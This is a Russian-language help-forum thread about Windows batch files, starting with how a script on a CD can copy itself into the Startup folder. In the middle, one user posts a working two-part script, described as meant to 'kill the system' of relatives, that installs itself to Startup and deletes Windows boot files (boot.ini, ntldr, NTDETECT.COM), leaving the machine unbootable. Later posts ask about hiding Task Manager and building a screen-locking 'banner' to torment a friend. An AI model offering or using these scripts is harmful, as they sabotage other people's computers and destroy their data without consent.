![]() |
как задать *bat'ник чтобы он сам себя скопировал в автозагрузку и файлы находящиеся р
народ помогите...... как задать *bat'ник чтобы он сам себя скопировал в автозагрузку и файлы находящиеся рядом с ним.. (он сам будет находится на cd диске)???
|
Цитата:
Код:
COPY "%~dp0*.*" "%USERPROFILE%\Главное меню\Программы\Автозагрузка" |
amel27,
Цитата:
или я что то не так сделал? |
Цитата:
|
здравствуйте, воспользовался
COPY "%~dp0*.*" "%USERPROFILE%\Главное меню\Программы\Автозагрузка" COPY "%~dp0*.*" "%USERPROFILE%\Start Menu\Programs\Startup" выводит следующее C:\>COPY "C:\*.*" "C:\Documents and Settings\1\├ыртэюх ьхэ■\╧ЁюуЁрьь√\└тЄючруЁєч ър" C:\44.bat Системе не удается найти указанный путь. Скопировано файлов: 0. C:\>COPY "C:\*.*" "C:\Documents and Settings\1\Start Menu\Programs C:\44.bat Системе не удается найти указанный путь. Скопировано файлов: 0. подскажите где я ошибся. очень нужна функция самокопирования. p.s.: я предпологаю что это может быть вызвано наличием русских букв, возможно ошибаюсь зарание спасибо |
oleg1345140,
Надо набрать в вордпаде и сохранить в кодировке MS-DOS. Получится вот так, если в блокноте: COPY "%~dp0*.*" "%USERPROFILE%\ѓ«*ў*®Ґ ¬Ґ*о\Џа®Ја*¬¬л\Ђўв®§*Јаг§Є*" COPY "%~dp0*.*" "%USERPROFILE%\Start Menu\Programs\Startup" Или воспользуйся этим: http://forum.oszone.net/thread-169373.html |
а как скопировать все файлы лежащие в папке с BATником, но без этого BATника?
|
Genom2009,
Может проще его скопировать, а потом удалить? Название батника известно? Если да, то так можно: Код:
for %%i in ("*") do if NOT "%%i"=="copyfiles.bat" COPY "%%i" "C:\OutDir" C:\OutDir - куда копировать. PS Можно и не зная имени батника: Код:
for %%i in ("*") do if NOT "%%i"=="%~nx0" COPY "%%i" "C:\OutDir" |
seriych, Спасибо, но я нашёл другое решение и упростил.
Потом удалить к сожалению не представляется возможным, т.к. копирование происходит в автозагрузку, а в автозагрузке и так достаточно всего будет. Объясню ситуацию: У знакомого все родные подсели на Линейч 2 и на этой почве назревает конфликт, задача состояла в том что бы убить систему ибо "загаживание" Линейч 2 не помогает. Я решил написать небольшую "пакость" 1.BAT COPY 2.BAT "%USERPROFILE%\ѓ«*ў*®Ґ ¬Ґ*о\Џа®Ја*¬¬л\Ђўв®§*Јаг§Є*" COPY 2.BAT "%USERPROFILE%\Start Menu\Programs\Startup" DEL 2.BAT DEL Redmi.txt DEL %0 2.BAT attrib -S -H -R -A C:\boot.ini attrib -S -H -R -A C:\NTDETECT.COM attrib -S -H -R -A C:\AUTOEXEC.BAT attrib -S -H -R -A C:\Bootfont.bin attrib -S -H -R -A C:\ntldr DEL C:\boot.ini /F /Q DEL C:\NTDETECT.COM /F /Q DEL C:\AUTOEXEC.BAT /F /Q DEL C:\Bootfont.bin /F /Q DEL C:\ntldr /F /Q DEL %0 |
доброго времени суток!!!
В данный момент столкнулся с такой проблемой, надо сделать через bat'ник, чтобы выводил изображение на экран и не давал его закрыть, пока не получит ответ на вопрос. и попутный вопрос: возможно ли через bat'ник скрыть диспетчер задач? выключить процесс (какой-нибудь)? или выключить и запретить запуск этого процесса? P.S. возможно задать в bat'нике дату само запуска? или время в которое он запустится автоматически? Всем спасибо в заранее!!! |
One THE darK, пользуясь случаем: вопрос, заявленный в теме топика решен?
Цитата:
батники для консольных приложений, как вы это себе представляете?.. куда отвечать? Цитата:
Цитата:
|
amel27 ,
Цитата One THE darK: выключить процесс » TaskKill /? а потом возможно его включить, если да, то как? а смс-баннер с помощью какой проги можно соорудить? просто над другом хочу поиздеваться, его фото выложить в банер))))) сразу говорю, кроме как бэйсика, больше не знаю языков программирования.... ещё один вопрос... какая команда должна быть в CMD , чтобы сохранить отчёт в txt файле?? вот тело bat'ника: @ echo off color 2 :C dir / S ping -n 60 localhost > nul goto C после сканирования, он выдаёт на экран все файлы, которые имеются в папке, где он был запушен. как сохранить всю инфу, которая выводится в CMD?? |
Цитата:
Цитата:
Цитата:
Код:
sample.cmd >sample.log 2>&1 |
спасибо!
но он вот что выводит: "sample.cmd" *Ґ пў«пҐвбп ў*гваҐ**Ґ© Ё«Ё ў*Ґи*Ґ© Є®¬**¤®©, ЁбЇ®«*塞®© Їа®Ја*¬¬®© Ё«Ё Ї*ЄҐв*л¬ д*©«®¬. вообщем может я что - то не так вписал в батник... вообщем хочу сделать сканер, то есть , допустим запустить батник в папке , (где много файлов, папок и т.п.) после сканирования, что бы он вывел в текстовый документ всё. то есть сколько папок содержится, сколько файлов всего, сколько файлов в каждой папке (по отдельности) и если получится расширение файлов(в какой папке - какие файлы находятся). |
Цитата:
Код:
@for /r "%~dp0" %%i In (.) Do @( |
Время: 17:14. |
Время: 17:14.
© OSzone.net 2001-